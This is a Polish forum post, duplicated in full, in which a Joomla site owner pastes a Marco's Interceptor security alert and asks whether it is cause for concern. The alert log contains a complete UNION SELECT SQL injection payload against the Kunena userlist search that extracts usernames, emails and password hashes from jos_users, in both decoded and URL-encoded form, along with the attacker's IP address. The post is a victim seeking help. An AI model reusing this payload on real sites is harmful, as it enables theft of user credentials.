zaba600
22-10-2012, 09:42
Witam
Moj serwis : www.wybierzagd.com.pl
joomla 1.5.26
dzisiaj dostałem taki komunikat :
forum Marco's interceptor warning (javascript:void(0);)
czy mam sie czym martwic ? nie bardzo sie orientuje w komunikatach bezpieczenstwa ?
czy cos dodatkowo zabezpieczyc ?
dziekuje z gory za pomoc !
** Union Select [GET:search] => %%\' and 1=2) union select 1, concat(0x62794467346e78,username,0x6861636b65642b6 2792b4467346e78,password,0x2a2a73716c7661722a2a),c oncat(0x3a,username,0x3a,email,0x3a,password,0x3a, activation),\'Super Administrator\',\'email\',\'2009-11-26 22:09:28\',\'2009-11-26 22:09:28\',62,1,1,0,0,0,1,15 from jos_users-- ;
** Table name in url [GET:search] => %%\' and 1=2) -- 1, concat(0x62794467346e78,username,0x6861636b65642b6 2792b4467346e78,password,0x2a2a73716c7661722a2a),c oncat(0x3a,username,0x3a,email,0x3a,password,0x3a, activation),\'Super Administrator\',\'email\',\'2009-11-26 22:09:28\',\'2009-11-26 22:09:28\',62,1,1,0,0,0,1,15 from jos_users-- ;
** Union Select [REQUEST:search] => %%\' and 1=2) union select 1, concat(0x62794467346e78,username,0x6861636b65642b6 2792b4467346e78,password,0x2a2a73716c7661722a2a),c oncat(0x3a,username,0x3a,email,0x3a,password,0x3a, activation),\'Super Administrator\',\'email\',\'2009-11-26 22:09:28\',\'2009-11-26 22:09:28\',62,1,1,0,0,0,1,15 from jos_users-- ;
** Table name in url [REQUEST:search] => %%\' and 1=2) -- 1, concat(0x62794467346e78,username,0x6861636b65642b6 2792b4467346e78,password,0x2a2a73716c7661722a2a),c oncat(0x3a,username,0x3a,email,0x3a,password,0x3a, activation),\'Super Administrator\',\'email\',\'2009-11-26 22:09:28\',\'2009-11-26 22:09:28\',62,1,1,0,0,0,1,15 from jos_users-- ;
**PAGE / SERVER INFO
*REMOTE_ADDR :
88.252.249.187
*REQUEST_METHOD :
GET
*QUERY_STRING :
option=com_kunena&func=userlist&search=%25%25'%20and%201=2)%20union%20select%201,% 20concat( 0x62794467346e78,username,0x6861636b65642b62792b44 67346e78,password,0x2a2a73716c7661722a2a),concat(0 x3a,username,0x3a,email,0x3a,password,0x3a,activat ion),'Super%20Administrator','email','2009-11-26%2022:09:28','2009-11-26%2022:09:28',62,1,1,0,0,0,1,15%20from%20jos_user s--%20;
** SUPERGLOBALS DUMP (sanitized)
*$_GET DUMP
-[option] => com_kunena
-[func] => userlist
-[search] => %%\' and 1=2) -- 1, concat(0x62794467346e78,username,0x6861636b65642b6 2792b4467346e78,password,0x2a2a73716c7661722a2a),c oncat(0x3a,username,0x3a,email,0x3a,password,0x3a, activation),\'Super Administrator\',\'email\',\'2009-11-26 22:09:28\',\'2009-11-26 22:09:28\',62,1,1,0,0,0,1,15 from -- users-- ;
*$_POST DUMP
*$_COOKIE DUMP
*$_REQUEST DUMP
-[option] => com_kunena
-[func] => userlist
-[search] => %%\' and 1=2) -- 1, concat(0x62794467346e78,username,0x6861636b65642b6 2792b4467346e78,password,0x2a2a73716c7661722a2a),c oncat(0x3a,username,0x3a,email,0x3a,password,0x3a, activation),\'Super Administrator\',\'email\',\'2009-11-26 22:09:28\',\'2009-11-26 22:09:28\',62,1,1,0,0,0,1,15 from -- users-- ;
Moj serwis : www.wybierzagd.com.pl
joomla 1.5.26
dzisiaj dostałem taki komunikat :
forum Marco's interceptor warning (javascript:void(0);)
czy mam sie czym martwic ? nie bardzo sie orientuje w komunikatach bezpieczenstwa ?
czy cos dodatkowo zabezpieczyc ?
dziekuje z gory za pomoc !
** Union Select [GET:search] => %%\' and 1=2) union select 1, concat(0x62794467346e78,username,0x6861636b65642b6 2792b4467346e78,password,0x2a2a73716c7661722a2a),c oncat(0x3a,username,0x3a,email,0x3a,password,0x3a, activation),\'Super Administrator\',\'email\',\'2009-11-26 22:09:28\',\'2009-11-26 22:09:28\',62,1,1,0,0,0,1,15 from jos_users-- ;
** Table name in url [GET:search] => %%\' and 1=2) -- 1, concat(0x62794467346e78,username,0x6861636b65642b6 2792b4467346e78,password,0x2a2a73716c7661722a2a),c oncat(0x3a,username,0x3a,email,0x3a,password,0x3a, activation),\'Super Administrator\',\'email\',\'2009-11-26 22:09:28\',\'2009-11-26 22:09:28\',62,1,1,0,0,0,1,15 from jos_users-- ;
** Union Select [REQUEST:search] => %%\' and 1=2) union select 1, concat(0x62794467346e78,username,0x6861636b65642b6 2792b4467346e78,password,0x2a2a73716c7661722a2a),c oncat(0x3a,username,0x3a,email,0x3a,password,0x3a, activation),\'Super Administrator\',\'email\',\'2009-11-26 22:09:28\',\'2009-11-26 22:09:28\',62,1,1,0,0,0,1,15 from jos_users-- ;
** Table name in url [REQUEST:search] => %%\' and 1=2) -- 1, concat(0x62794467346e78,username,0x6861636b65642b6 2792b4467346e78,password,0x2a2a73716c7661722a2a),c oncat(0x3a,username,0x3a,email,0x3a,password,0x3a, activation),\'Super Administrator\',\'email\',\'2009-11-26 22:09:28\',\'2009-11-26 22:09:28\',62,1,1,0,0,0,1,15 from jos_users-- ;
**PAGE / SERVER INFO
*REMOTE_ADDR :
88.252.249.187
*REQUEST_METHOD :
GET
*QUERY_STRING :
option=com_kunena&func=userlist&search=%25%25'%20and%201=2)%20union%20select%201,% 20concat( 0x62794467346e78,username,0x6861636b65642b62792b44 67346e78,password,0x2a2a73716c7661722a2a),concat(0 x3a,username,0x3a,email,0x3a,password,0x3a,activat ion),'Super%20Administrator','email','2009-11-26%2022:09:28','2009-11-26%2022:09:28',62,1,1,0,0,0,1,15%20from%20jos_user s--%20;
** SUPERGLOBALS DUMP (sanitized)
*$_GET DUMP
-[option] => com_kunena
-[func] => userlist
-[search] => %%\' and 1=2) -- 1, concat(0x62794467346e78,username,0x6861636b65642b6 2792b4467346e78,password,0x2a2a73716c7661722a2a),c oncat(0x3a,username,0x3a,email,0x3a,password,0x3a, activation),\'Super Administrator\',\'email\',\'2009-11-26 22:09:28\',\'2009-11-26 22:09:28\',62,1,1,0,0,0,1,15 from -- users-- ;
*$_POST DUMP
*$_COOKIE DUMP
*$_REQUEST DUMP
-[option] => com_kunena
-[func] => userlist
-[search] => %%\' and 1=2) -- 1, concat(0x62794467346e78,username,0x6861636b65642b6 2792b4467346e78,password,0x2a2a73716c7661722a2a),c oncat(0x3a,username,0x3a,email,0x3a,password,0x3a, activation),\'Super Administrator\',\'email\',\'2009-11-26 22:09:28\',\'2009-11-26 22:09:28\',62,1,1,0,0,0,1,15 from -- users-- ;